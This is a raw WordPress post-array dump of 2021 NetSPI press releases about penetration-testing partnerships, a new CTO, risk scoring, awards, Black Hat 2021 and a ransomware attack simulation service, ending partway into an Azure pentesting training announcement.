SecureLink is a risk advisory firm headquartered in Dubai, UAE, and part of the StarLink Group of companies that has a turnover of USD 500 Million, over 375 employees and presence in 20 countries in the META region, including UK and USA.  SecureLink is an independent advisory firm assisting customers in identifying, mitigating, and managing their business risks. SecureLink provides comprehensive assessment of risks across People, Process & Technology and helps with the right governance frameworks to ensure that risks are continuously monitored and acted upon. SecureLink offers these services via its partner community to develop frameworks and implement platforms for automation of governance, risk, and compliance requirements. For more information about SecureLink, please visit www.securelinkme.net

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

SecureLink Press Contact:
Raji Joy John
Marketing Director, StarLink
raji@starlinkme.net
+971 4 2794000

NetSPI Media Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

[post_title] => SecureLink and NetSPI partner to enable enterprises to manage their attack surface with tech-enabled penetration testing services [post_excerpt] => Learn about SecureLink and NetSPI's distribution agreement which will provide attack surface management and enterprise pentesting services to the Middle East and Africa (MEA) region. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securelink-netspi-partnership-penetration-testing-services [to_ping] => [pinged] => [post_modified] => 2021-10-27 14:14:23 [post_modified_gmt] => 2021-10-27 19:14:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26594 [menu_order] => 128 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [29] => WP_Post Object ( [ID] => 26390 [post_author] => 91 [post_date] => 2021-09-14 08:00:00 [post_date_gmt] => 2021-09-14 13:00:00 [post_content] =>

Tel Aviv and Minneapolis, Minnesota  –  Apiiro, the industry’s first Code Risk Platform™, and NetSPI, the leader in penetration testing and attack surface management, today announced a strategic partnership to combine Apiiro's comprehensive Application Risk Management capabilities with NetSPI’s Penetration Testing as a Service (PTaaS). The partnership enables contextual and risk-based application security testing for its mutual customers.

Organizations rely on penetration testing for releasing and maintaining secure applications. As a result of the partnership, NetSPI customers will be able to test their applications, networks, and cloud infrastructure at scale and manage their attack surfaces using risk visibility and context provided by Apiiro. NetSPI’s PTaaS will be supported by Apiiro’s comprehensive view of security and compliance risks and keen understanding of how to manage the complexities of a risk-based Secure Software Development Lifecycle (SSDLC).

To keep pace with the speed of software development today, both companies advocate for running penetration tests in a smart and consistent way. Instead of performing pentests on a set schedule, they should be performed continuously as high risk changes are identified in an environment. Apiiro helps focus pentests on material changes to application and infrastructure code, enabling organizations to target their security processes. Through this contextual approach to application pentesting, customers can better automate the testing process and identify business-critical security vulnerabilities. 

“Apiiro is pleased to be joining forces with NetSPI to provide our customers with next-gen context aware pen-testing capabilities that will reduce the friction between pen-testers and development teams and help deliver secure products faster. ” said Idan Plotnik, CEO at Apiiro. “We were impressed by NetSPI’s ability to swiftly identify areas of critical vulnerabilities, and deliver high quality results that allow their customers to have peace of mind and focus on their business priorities.”

“Applications are the lifeblood of organizations today. As application development accelerates, the way we approach security testing needs to evolve,” said Aaron Shilts, President and CEO at NetSPI. “NetSPI and Apiiro are changing the way security teams approach penetration testing. By providing real-time visibility into application attack surface changes, we can better enable continuous and contextual testing to help clients find, fix, and remediate their vulnerabilities faster.”

About Apiiro

Apiiro is the industry's first Code Risk Platform™ to provide Application Risk Management with every change, from design to code to cloud. Apiiro is re-inventing the secure development lifecycle for Agile and cloud-native development and gives organizations a 360° view of security and compliance risks, from design to production, across applications, infrastructure, developers' knowledge, and business impact. Apiiro is backed by Greylock and Kleiner Perkins. www.apiiro.com

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Apiiro Media Contact:
Kelly Hall
Offleash PR for Apiiro
apiiro@offleashpr.com

NetSPI Media Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

[post_title] => Apiiro and NetSPI Partner to Provide Contextual, Risk-Based Penetration Testing [post_excerpt] => Want contextual, risk-based pentesting? Read about the strategic partnership to combine Apiiro's comprehensive Application Risk Management capabilities with NetSPI’s Penetration Testing as a Service (PTaaS). [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => apiiro-netspi-partnership-contextual-risk-based-penetration-testing [to_ping] => [pinged] => [post_modified] => 2021-09-13 15:21:10 [post_modified_gmt] => 2021-09-13 20:21:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26390 [menu_order] => 146 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [30] => WP_Post Object ( [ID] => 26216 [post_author] => 91 [post_date] => 2021-08-18 08:00:00 [post_date_gmt] => 2021-08-18 13:00:00 [post_content] =>
As CTO, Travis will drive penetration testing, adversary simulation, and attack surface management product strategy to support clients and services teams.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced Travis Hoyt as its new Chief Technology Officer (CTO). In his new role, Travis is responsible for enhancing and expanding NetSPI’s technology-enabled services portfolio.

Travis brings over 20 years of cybersecurity leadership experience to NetSPI, previously leading security programs for major financial institutions, including Bank of America and TIAA, where he focused on application security and technology-enabled control transformation. Embracing innovation, he has built and patented two technologies from scratch – a vulnerability assessment and management platform and a posture management solution – well before the market.

“The client perspective and spirit of innovation Travis adds to our team is invaluable to our business and the success of our clients,” said Aaron Shilts, President and CEO at NetSPI. “Travis has a track record of bringing the vision, design, and execution of technologies to life. With his leadership, we are eager to continue disrupting the historically-stagnant pentesting and vulnerability management space.”

“The quality of the NetSPI team and their reputation for innovation is unmatched in the penetration testing industry,” said Travis. “As CTO I’m excited to provide immediate input into the product roadmap and help the team recognize what we need to do to provide the most value to our clients. Looking to the future, I’m eager to start exploring the next generation architecture that will drive the industry forward.”

Connect with Travis Hoyt on LinkedIn, or learn more about NetSPI’s penetration testing services.

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Media Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

[post_title] => Financial Services Security Veteran Travis Hoyt Joins NetSPI as CTO [post_excerpt] => Read about NetSPI's new Chief Technology Officer (CTO), Travis Hoyt, who is responsible for enhancing and expanding NetSPI’s technology-enabled services portfolio. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cto-travis-hoyt-joins-netspi [to_ping] => [pinged] => [post_modified] => 2021-08-17 16:45:13 [post_modified_gmt] => 2021-08-17 21:45:13 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26216 [menu_order] => 147 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [31] => WP_Post Object ( [ID] => 26114 [post_author] => 91 [post_date] => 2021-08-10 08:00:00 [post_date_gmt] => 2021-08-10 13:00:00 [post_content] =>
As a part of a risk-based vulnerability management program, organizations can leverage NetSPI’s risk scoring for industry benchmarking, prioritization of security activities, and more.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the addition of risk scoring to its ResolveTM penetration testing and vulnerability management platform. In conjunction with Penetration Testing as a Service (PTaaS), NetSPI’s risk scoring intelligence helps its clients prioritize, manage, and remediate the vulnerabilities that present the greatest risk to their business. 

NetSPI’s new risk scoring capabilities dynamically integrate into PTaaS to provide both a granular vulnerability risk score as well as an aggregate risk score for an organization and its projects, assets, applications, and networks. Risk scoring is only available to NetSPI clients that leverage its penetration testing services.

The risk scores serve as a quantitative metric for risk reduction over time, cybersecurity spend validation, resource allocation, and industry benchmarking. NetSPI’s risk score enables organizations to incorporate business context and the respective threat landscape to accurately prioritize remediation of vulnerabilities.

“There are varying approaches to assigning vulnerability severity, but risk today extends far beyond individual vulnerabilities,” said Jake Reynolds, Head of Product at NetSPI. “The key is to recognize the risks most likely to disrupt the business, identify the threats that would increase those risks, and prioritize the most appropriate mitigations to protect your organization from those threats. NetSPI’s risk scoring does just that.”

According to Gartner[i], organizations with a risk-based vulnerability management program are expected to experience 80% fewer breaches. Download this whitepaper to learn how to use risk scoring to propel your risk-based vulnerability management program forward – and for a detailed overview of NetSPI’s risk score methodology.

Download How to Use Risk Scoring to Propel Your Risk-Based Vulnerability Management Program Forward.

“Reactive cybersecurity is a thing of the past. Security leaders must get proactive and take a risk-based approach to stay ahead of today’s adversaries,” said NetSPI President and CEO Aaron Shilts. “Our risk scores enable NetSPI clients to make proactive security decisions based on their unique risk factors. In other words, it allows them to confidently allocate budget and resources to the vulnerabilities that matter most.”

Learn more about PTaaS online here or contact us for a demo of NetSPI’s penetration testing and vulnerability management platform, Resolve™.


[i] Gartner, 2019 – Forecast Analysis: Risk-Based Vulnerability Management, Worldwide (Gardner, Dale)

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Media Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

[post_title] => NetSPI Adds Risk Scoring to its Penetration Testing and Vulnerability Management Platform [post_excerpt] => Learn about NetSPI's new aggregate and vulnerability risk scoring capabilities for its penetration testing clients. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-adds-risk-scoring-to-resolve [to_ping] => [pinged] => [post_modified] => 2021-08-09 20:50:47 [post_modified_gmt] => 2021-08-10 01:50:47 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26114 [menu_order] => 150 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [32] => WP_Post Object ( [ID] => 26129 [post_author] => 91 [post_date] => 2021-08-05 14:58:00 [post_date_gmt] => 2021-08-05 19:58:00 [post_content] =>

On August 5, 2021, NetSPI was named Minne Inno's Blazer Award winner for the High Tech Company category:

After honoring 50 companies as Inno on Fire honorees, Minne Inno — the Business Journal’s news outlet focused on the startup scene — presents this year’s Blazer Award winners. The Blazer winners were selected from the 50 Fire honorees by a panel of judges who chose one company from each category that is lighting its industry on fire.

High Tech Company

NetSPI

NetSPI doubled down on talent and grew its team over the past year.

Earlier this summer, the Minneapolis-based cybersecurity firm added a ransomware attack simulation, in addition to its portfolio of penetration testing services.

“It was a good time for us, because we were already in the middle of disrupting an already stale industry,” Shilts said. “We moved fast, we over communicated, but more than anything, we just focused on taking care of our customers.”

Moving forward, NetSPI has plans to keep disrupting the industry without compromising quality.

“Cyber is still fast moving and very innovative, but when you’re really a disruptor and changing the way people consume a service, that gets everybody excited,” Shilts said.

To learn more, read the full article here:
https://www.bizjournals.com/twincities/inno/stories/inno-on-fire/2021/08/05/blazer-awards.html

[post_title] => NetSPI named a Minne Inno Blazer Award winner [post_excerpt] => On August 5, 2021, NetSPI was named Minne Inno's Blazer Award winner for the High Tech Company category. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => minne-inno-blazer-award-winner [to_ping] => [pinged] => [post_modified] => 2021-08-11 14:22:26 [post_modified_gmt] => 2021-08-11 19:22:26 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26129 [menu_order] => 151 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [33] => WP_Post Object ( [ID] => 25909 [post_author] => 91 [post_date] => 2021-07-14 13:06:23 [post_date_gmt] => 2021-07-14 18:06:23 [post_content] =>
Celebrating the 35th class of unstoppable entrepreneurs who transform the Heartland Region and beyond.

Minneapolis, Minnesota  –  Ernst & Young LLP (EY US) announced that NetSPI CEO and President Aaron Shilts was named an Entrepreneur Of The Year® 2021 Heartland Award finalist. Now in its 35th year, the Entrepreneur Of The Year program honors unstoppable business leaders whose ambition, ingenuity and courage in the face of adversity help catapult us from the now to next and beyond. 

Shilts was selected by a panel of independent judges. Award winners will be announced during a special virtual celebration on Tuesday, July 27, 2021, becoming lifetime members of an esteemed community of Entrepreneur Of The Year alumni from around the world.

Entrepreneur Of The Year is one of the preeminent competitive award programs for entrepreneurs and leaders of high-growth companies. The nominees are evaluated based on six criteria: entrepreneurial leadership; talent management; degree of difficulty; financial performance; societal impact and building a values-based company; and originality, innovation, and future plans. Since its launch, the program has expanded to recognize business leaders in more than 145 cities in over 60 countries around the world.

“This recognition validates the incredible work our team is doing,” said Shilts. “NetSPI team members operate as entrepreneurs every day and it’s an honor to help lead and support some of the most brilliant people in cybersecurity.”

Regional award winners are eligible for consideration for the Entrepreneur Of The Year National Awards, to be announced in November 2021 at the Strategic Growth Forum®, one of the nation’s most prestigious gatherings of high-growth, market-leading companies. The Entrepreneur Of The Year National Overall Award winner will then move on to compete for the EY World Entrepreneur Of The Year™ Award in June 2022.

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Sponsors

Founded and produced by Ernst & Young LLP, the Entrepreneur Of The Year Awards are nationally sponsored by SAP America and The Kauffman Foundation. In the Heartland Region sponsors also include Colliers International, Padilla, PNC Bank, SALO, LLC, and Twin Cities Business.

About Entrepreneur Of The Year®

Entrepreneur Of The Year® is the world’s most prestigious business awards program for unstoppable entrepreneurs. These visionary leaders deliver innovation, growth and prosperity that transform our world. The program engages entrepreneurs with insights and experiences that foster growth. It connects them with their peers to strengthen entrepreneurship around the world. Entrepreneur Of The Year is the first and only truly global awards program of its kind. It celebrates entrepreneurs through regional and national awards programs in more than 145 cities in over 60 countries. National Overall winners go on to compete for the EY World Entrepreneur Of The Year™ title. Visit ey.com/us/eoy

About EY Private

As Advisors to the ambitious™, EY Private professionals possess the experience and passion to support private businesses and their owners in unlocking the full potential of their ambitions. EY Private teams offer distinct insights born from the long EY history of working with business owners and entrepreneurs. These teams support the full spectrum of private enterprises including private capital managers and investors and the portfolio businesses they fund, business owners, family businesses, family offices and entrepreneurs. Visit ey.com/us/private

About EY

EY exists to build a better working world, helping create long-term value for clients, people and society and build trust in the capital markets. 

Enabled by data and technology, diverse EY teams in over 150 countries provide trust through assurance and help clients grow, transform, and operate.

Working across assurance, consulting, law, strategy, tax, and transactions, EY teams ask better questions to find new answers for the complex issues facing our world today.

EY refers to the global organization, and may refer to one or more, of the member firms of Ernst & Young Global Limited, each of which is a separate legal entity. Ernst& Young Global Limited, a UK company limited by guarantee, does not provide services to clients. Information about how EY collects and uses personal data and a description of the rights individuals have under data protection legislation are available via ey.com/privacy. EY member firms do not practice law where prohibited by local laws. For more information about our organization, please visit ey.com.

Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

[post_title] => EY US Announces NetSPI CEO Aaron Shilts as an Entrepreneur Of The Year 2021® Heartland Award Finalist [post_excerpt] => The award celebrates unstoppable entrepreneurs who transform the Heartland Region and beyond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => entrepreneur-of-the-year-2021-heartland-award-finalist [to_ping] => [pinged] => [post_modified] => 2021-07-15 12:00:01 [post_modified_gmt] => 2021-07-15 17:00:01 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25909 [menu_order] => 158 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [34] => WP_Post Object ( [ID] => 25827 [post_author] => 91 [post_date] => 2021-07-08 15:00:00 [post_date_gmt] => 2021-07-08 20:00:00 [post_content] =>

Las Vegas, Nevada  –  NetSPI, the leader in enterprise penetration testing and attack surface management, is attending Black Hat USA 2021 at the Mandalay Bay Convention Center in Las Vegas. This year, the hybrid event will be held in-person and online, featuring cybersecurity trainings, expert-led briefings, networking opportunities, and more. During the conference, the NetSPI team will feature its ransomware attack simulation service and will unveil new, innovative features added to its penetration testing and vulnerability management platform, Resolve™. Connect with NetSPI’s penetration testing and ransomware experts at the Black Hat Business Hall (in-person or virtually) at booth #1579.

To learn more, visit the Black Hat USA website.

Who:

Jake Reynolds, Head of Product at NetSPI
Scott Sutherland, Practice Director at NetSPI

What:

Black Hat Business Hall (In-Person and Virtual)
Meet the NetSPI team at booth #1579 to learn more about their expertise in enterprise penetration testing and attack surface management. Get a first look and demo of NetSPI’s new risk scoring feature and learn more about its ransomware attack simulation service. Bonus: Visit the in-person or virtual NetSPI booths for a chance to win a 128 GB Oculus Quest VR headset.

CANCELED: NetSPI Happy Hour at the Mandalay Bay Foundation Room
NetSPI’s August 4 happy hour during Black Hat at the Mandalay Bay Foundation Room has been canceled to limit the spread of the COVID-19 Delta variant, following the latest CDC guidance. The ransomware session will now be available as a webinar on August 17. Register here: How to Build and Validate Ransomware Attack Detections

When:

Black Hat In-Person: 
August 4, 2021 | 10am – 6pm PT
August 5, 2021 | 10am – 4pm PT

Black Hat Virtual: 
August 4, 2021 | 8:30am – 5pm PT
August 5, 2021 | 8:30am – 4pm PT

Where:

Black Hat In-Person Business Hall: 
Booth #1579
Mandalay Bay Convention Center
Las Vegas, NV

Black Hat Virtual Business Hall: 
Booth #1579

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

About Black Hat

Founded in 1997, Black Hat is an internationally recognized cybersecurity event series providing the most technical and relevant information security research. Grown from a single annual conference to the most respected information security event series internationally, these multi-day events provide the security community with the latest cutting-edge research, developments, and trends.

Press Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

[post_title] => NetSPI to Highlight Ransomware Resiliency, Risk-Based Vulnerability Management, and Penetration Testing as a Service During Black Hat 2021 [post_excerpt] => NetSPI attends Black Hat 2021 with a focus on ransomware, vulnerability management, and penetration testing as a service. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => black-hat-usa-2021 [to_ping] => [pinged] => [post_modified] => 2021-08-02 16:48:41 [post_modified_gmt] => 2021-08-02 21:48:41 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25827 [menu_order] => 161 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [35] => WP_Post Object ( [ID] => 25619 [post_author] => 91 [post_date] => 2021-06-18 15:04:22 [post_date_gmt] => 2021-06-18 20:04:22 [post_content] =>

On June 18, 2021, NetSPI was recognized as a 2021 Fire Award winner.

The Fire Awards are always meant to be a celebration of the companies and people that keep Minnesota's tech and startup scene alive.

With this year's fourth annual Fire Awards, we want to celebrate even harder than ever before after one of the most trying years in memory. That's why we have the biggest Fire Awards ever, honoring 50 companies from across the state.

We sourced these Fire winners from our readers and added some companies that have made waves in the past year or are on the precipice of big things. Many companies were honored because of the steps they took to help tackle the Covid-19 pandemic.

In July, a Blazer winner will be selected from each category by a panel of judges. Blazer winners are the hottest companies in each category, deserving some extra recognition. More details about that event will come out later this month.

We've honored companies in a variety of categories. Startup of the Year is the startup that has risen above the rest in the past year, while the Growing Companies category is for those companies that are a bit smaller but show the potential to be a Startup of the Year down the road. We're also honoring the organizations that support our ecosystem with the community builder category, as well as a few specific industries like medical devices and health and wellness.

Let's meet our Fire winners!

High Tech Company:

NetSPI is a Minneapolis-based cybersecurity company that specializes in penetration testing, which is sometimes called ethical hacking. In May, it raised $90 million in venture capital. Its clients include Fortune 500 companies like Medtronic and Microsoft.

Digi Key is an electronics distributor and one of Minnesota's largest private companies. The Theif River Falls-based company helped the University of Minnesota produce the Coventor, a jerry-rigged ventilator that helped address ventilator shortages during the Covid-19 pandemic.

Arctic Wolf is a transplanted unicorn cybersecurity company. Founded in Silicon Valley, it moved to Eden Prairie in 2020 at the same time it announced a $200 million round of venture capital funding at a valuation of over $1 billion.

Lucy, also known as Equals3, is a Minneapolis-based AI firm that helps Fortune 500 clients manage their data. It raised $3 million in June and plans to double its employee base to over 50 by the end of the year.

Carrot Health is a Minneapolis-based firm that collects consumer data for health plans to help them address what are known as the social determinants of health, or environmental factors that affect people's health. It has been experiencing 100% growth since it was founded.

Read the full article here: https://www.bizjournals.com/twincities/inno/stories/inno-on-fire/2021/06/18/meet-minne-innos-2021.html

[post_title] => Minne Inno announces the 2021 Fire Awards [post_excerpt] => On June 18, 2021, NetSPI was recognized as a 2021 Fire Award winner. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => minne-inno-announces-the-2021-fire-awards [to_ping] => [pinged] => [post_modified] => 2021-06-18 15:04:23 [post_modified_gmt] => 2021-06-18 20:04:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25619 [menu_order] => 167 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [36] => WP_Post Object ( [ID] => 25599 [post_author] => 91 [post_date] => 2021-06-17 08:00:00 [post_date_gmt] => 2021-06-17 13:00:00 [post_content] =>
Through the tech-enabled service, organizations can put their ransomware prevention and detection capabilities to the test.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced its new ransomware attack simulation service. In collaboration with its ransomware security experts, the new service enables organizations to emulate real world ransomware families to find and fix critical vulnerabilities in their cybersecurity defenses.

Recent ransomware attacks have exposed major cybersecurity gaps globally. In the U.S., the Biden administration is urging business leaders to take immediate steps to prepare for ransomware attacks. In a recent memo, deputy national security advisor for cyber and emerging technology Anne Neuberger recommends organizations, “use a third-party pentester to test the security of your systems and your ability to defend against a sophisticated [ransomware] attack.”

“Paying a ransom doesn’t guarantee your data is returned safely, yet, one in four companies worldwide pay the adversariesI,” said Scott Sutherland, Practice Director at NetSPI. “Organizations must get more proactive with their security efforts to avoid paying the ransom and funding the cybercriminals. Ransomware families are both opportunistic and targeted – and no industry is exempt from falling victim to an attack.”

“NetSPI is eager to help organizations achieve a more scalable and continuous assessment of their environment from the perspective of an adversary,” said Charles Horton, COO at NetSPI. “The addition of the ransomware attack simulation service to our adversary simulation solutions will further help organizations strengthen their defenses and become more resilient against ransomware attacks.”

During a ransomware attack simulation engagement, NetSPI closely collaborates with organizations to simulate sophisticated ransomware tactics, techniques, and procedures (TTPs) using its custom-built breach and attack simulation technology. Following each engagement, organizations gain access to NetSPI’s technology to run custom plays on their own and continuously evaluate how well their cybersecurity program will hold up to a ransomware attack.

Learn more about NetSPI’s ransomware attack simulation online here and download The Ultimate Guide to Ransomware Attacks for insights on how to prevent and respond to a ransomware attack.

The Ultimate Guide to Ransomware Attacks – Download Now

SonicWall 2021 Cyber Threat Report; https://www.sonicwall.com/2021-cyber-threat-report/

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Contact:
Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277

[post_title] => Improve Ransomware Attack Resiliency with NetSPI’s New Ransomware Attack Simulation [post_excerpt] => Learn how NetSPI's new ransomware attack simulation service enables organizations to find and fix critical vulnerabilities in their ransomware defenses. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => ransomware-attack-resiliency [to_ping] => [pinged] => [post_modified] => 2021-06-23 14:07:08 [post_modified_gmt] => 2021-06-23 19:07:08 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25599 [menu_order] => 168 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [37] => WP_Post Object ( [ID] => 25593 [post_author] => 91 [post_date] => 2021-06-16 22:48:57 [post_date_gmt] => 2021-06-17 03:48:57 [post_content] =>

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the Top Workplaces in Minnesota by the Star Tribune. Top Workplaces recognizes the most progressive companies in Minnesota based on employee opinions measuring engagement, organizational health, and satisfaction. 

“NetSPI wouldn’t be what it is today without its employees and the culture of innovation that we’ve built,” said NetSPI President and CEO Aaron Shilts. “Even during a turbulent 2020, we had an employee retention rate of 92% which alone speaks volumes in an industry that has zero percent unemployment. I thank each and every member of our team for helping to make NetSPI a Top Workplace.”

The results of the Star Tribune Top Workplaces are based on survey information collected by Energage, an independent company specializing in employee engagement and retention. The analysis includes responses from over 76,000 employees at Minnesota public, private and nonprofit organizations. 

NetSPI is hiring—apply today!

“We are especially proud of the fact that our employees called out NetSPI’s top strengths as interdepartmental cooperation, execution, and innovation. This award shows how well our teams work together, which is a key to our success,” said NetSPI Director of People Operations Heather Neumeister. “Seeing the variety of responses throughout the survey really validates the culture we have at NetSPI. Working with great people, doing important work, and having fun came through in many of the comments provided.”

This Top Workplace recognition follows an especially successful 12 months for NetSPI. Recently, NetSPI announced it raised $90 million in growth funding led by KKR, with participation from Ten Eleven Ventures. In 2020, NetSPI acquired Silent Break Security and incorporated its proprietary Adversary Simulation and Red Team Toolkit software into the company’s offensive cyber security and attack surface management offerings. NetSPI also launched Penetration Testing as a Service (PTaaS) in 2020, powered by its Resolve™ platform. 2021 also promises more business opportunities for NetSPI with upcoming additions of risk scoring, vulnerability intelligence, ransomwareattack simulation, and more.

To qualify for the Star Tribune Top Workplaces, a company must have more than 50 employees in Minnesota. Nearly 3,000 companies were invited to participate. Rankings were composite scores calculated purely on the basis of employee responses.

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Tool Kit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Media Contacts:
Elyse Bauchle, Maccabee PR for NetSPI
elyse@maccabee.com
(612) 294-3125

Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277

[post_title] => NetSPI Named a 2021 Top Workplace in Minnesota [post_excerpt] => Learn why NetSPI was named a 2021 top workplace in Minnesota by the Star Tribune. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => top-workplaces-minnesota-2021 [to_ping] => [pinged] => [post_modified] => 2021-06-23 14:07:16 [post_modified_gmt] => 2021-06-23 19:07:16 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25593 [menu_order] => 169 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [38] => WP_Post Object ( [ID] => 25552 [post_author] => 91 [post_date] => 2021-06-10 05:00:00 [post_date_gmt] => 2021-06-10 10:00:00 [post_content] =>
The new training course provides a deep dive on the attack surface introduced by Azure and how to exploit its vulnerabilities.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced Dark Side Ops (DSO) 3: Azure Cloud Pentesting, a new cybersecurity training course focused on Azure cloud penetration testing. Participants will gain a better understanding of potential risks associated with Azure cloud deployments, how to exploit them, and how to prevent and remediate critical cloud vulnerabilities.

